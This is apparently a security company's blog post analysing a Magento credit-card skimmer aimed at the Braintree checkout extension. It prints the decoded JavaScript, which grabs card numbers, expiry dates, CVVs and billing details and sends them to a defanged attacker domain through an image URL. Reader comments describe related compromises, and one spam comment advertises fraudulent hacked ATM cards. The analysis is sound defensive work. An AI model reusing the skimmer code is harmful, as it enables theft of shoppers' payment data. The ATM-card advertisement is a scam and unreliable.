Magento Credit Card Stealer for Braintree Extension

  • June 3, 2016

We regularly find and write about malware that steals credit card details from Magento sites because attackers discover new techniques to obtain sensitive data daily. This time, the malicious code is specifically designed for Magento sites that use the Braintree extension. This extension connects a Magento store with the Braintree payment processing service that is supposed to be (among other things) adding extra security for credit card transactions. Ironically, hackers piggyback some of the Braintree objects in order to steal credit card details during the checkout process.

The obfuscated code was added in the js/varien/accordion.js file.

var _0x53bc = ["\x71\x20\x66\x3D\x45\x3B\x35\x3D\x27\x44\x27 \x3B\x43\x20…

Here’s what it looks like after decoding:

var se = false;
pf = 'gene_braintree_creditcard';

function timedMe() {
    if (payment['currentMethod']) pf = payment['currentMethod'];
    if ((!se) && (document.getElementById(pf + '_cc_number'))) {
        fln = document.getElementById('billing_firstname').value + ' ' + document.getElementById('billing_lastname').value;
       ...skipped...
        cn = document.getElementById(pf + '_cc_number').value.replace(/\s/g, '');
        cem = document.getElementById(pf + '_expiration').value;
        cey = document.getElementById(pf + '_expiration_yr').value;
        cvv = document.getElementById(pf + '_cc_cid').value;
        if ((cn.length == 16 && cvv.length == 3) || (cn.length == 15 && cvv.length == 4)) {
            se = true;
            var i = document.createElement('img');
            i.src = 'hxxps://scriptb[.]com/l2.php?p=197' + encodeURIComponent('&fln=' + fln + '&ct=' + ct + '&cn=' + cn + '&cem=' + cem + '&cey=' + cey + '&cvv=' + cvv + '&co=' + co + '&ci=' + ci + '&st=' + st + '&ad=' + ad + '&zp=' + zp)
        }
    }
}
setInterval('timedMe()', 700);

Roughly every second, the timedMe function checks if the order form has been completed, meaning the customer has entered a credit card number and CVV, and sends the entered data to a remote server. To obtain the form data, the malicious code uses the Braintree gene_braintree_creditcard object which is used for regular credit card payments. They also have gene_braintree_paypal for PayPal payments, but in this particular case, the attackers are only interested in credit cards.

It’s interesting how hackers transfer the stolen sensitive data to their site. They dynamically build an image tag that links to the attacker-controlled “scriptb[.]com” site, passing all the stolen data in the image URL parameters (not even encrypting them).

Other files could also contain this malicious code, or even different code that will re-add the injection back in the site even after the above is removed. If this happens, just contact us. We will be happy to answer any of your questions as well as inspect and clean the website.

This case shows that if your ecommerce site has a checkout form where customers enter their credit card details, there is no way to prevent data theft if your site is hacked. Even using trusted third-party payment processing services behind the scenes will not help – the data is being stolen before it reaches them. That’s why you should really consider redirecting customers to trusted third-party payment processing sites to complete transactions rather than having them enter credit card details on your site. If you have more questions about ecommerce security or specifically around how to account for PCI compliance let us know.

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Related Tags
9 comments

  1. The same skimming method was used on our Magento shop (exploited via MAGMI) about 2 years ago. If I remember correctly, the i.src request wasn’t even an https request and even though our checkout was secure, no browsers kicked up any warnings about an insecure request being made, I assume because it was a 404. Pretty slick. Even if it was a 404, the request params would still end up in their log files for them to access at will. Very expensive lesson for us and the reason I found out about you guys. Keep up the good work!

      1. We were actually hacked pretty bad by more than one person.

        Once we started receiving emails from customers about charges being made to new cards they only used at our website we ran a scan to search for files with escaped hex characters and found an obfuscated php web shell in /skin/install/mage_db.php.

        One of them modified OnepageController.php and was storing details into our own database in a “salesrule_customer_item” table and another guy was skimming with the timedMe() approach shown above except it was added in js/varien/js.js and modified to grab cards from our checkout form.

        We use the Paradoxlabs Authorize.net + CIM extension which thankfully spared most of our customers because their cards were already saved in the CIM at Authorize.

  2. Is Stripe.js vulnerable to this type of attack, or is it as secure as an externally-hosted payment page?

  5. Not very good disclosure, much is missing.
    First, responsible disclosure should contain instructions on how to secure a store against the attack.
    Second, the disclosure should contain information if and when the issue has been communicated with Magento and/or braintree
    Third, it should make it clearer that the hackers ​*use*​ an issue in the braintree extension to inject the code into the JS file. Because there is so little information in the post it sounds a bit as if the braintree extension itself contains that code or does it on it’s own.
    Finally, the twitter handle @mirphak is listed as a contact channel but tweets are protected, which pretty much only leaves Disqus as a public channel – and that is moderated. Communication around public disclosures should have an open and transparent.

  6. One of my websites has been compromised by this malware, so I confirm this malware is out there. In my case it attached to another payment extension, not Braintree.

  7. You are welcome to the wonder land of hacks, want to know how to hack an ATM MACHINE OR BANK ACCOUNT? You can hack and break into a bank’s security without carrying guns or any weapon.

    We are universal hackers and we just succeeded with an illegal invention.. well, this seems strange but true.. we just succeeded with hacking universal ATM machines with a blank ATM card.. These cards could withdraw $5000 per day, each of the card can only be useless once you withdrew the total amount of $10 Million United State Dollars. The card will make the security camera malfunction at that particular time until you are done with the transaction you can never be traced.. depending on how they are programmed..say goodbye to poverty, these cards are just for you.we know this is illegal but we are living large with it i do many things on low key to avoid suspicion.i am not going to give out the blank cards for free because we spent most of our time hacking it. so, we want to make them available for you. NOTE: The ATM cards has no registered account number, they can work anywhere in the world, and they are untraceable.We are currently selling this black card at a give away price to serious minded people. If you need this card, contact me with this email: info.hackcreditcard@gmail.com

Comments are closed.

Related Categories
You May Also Like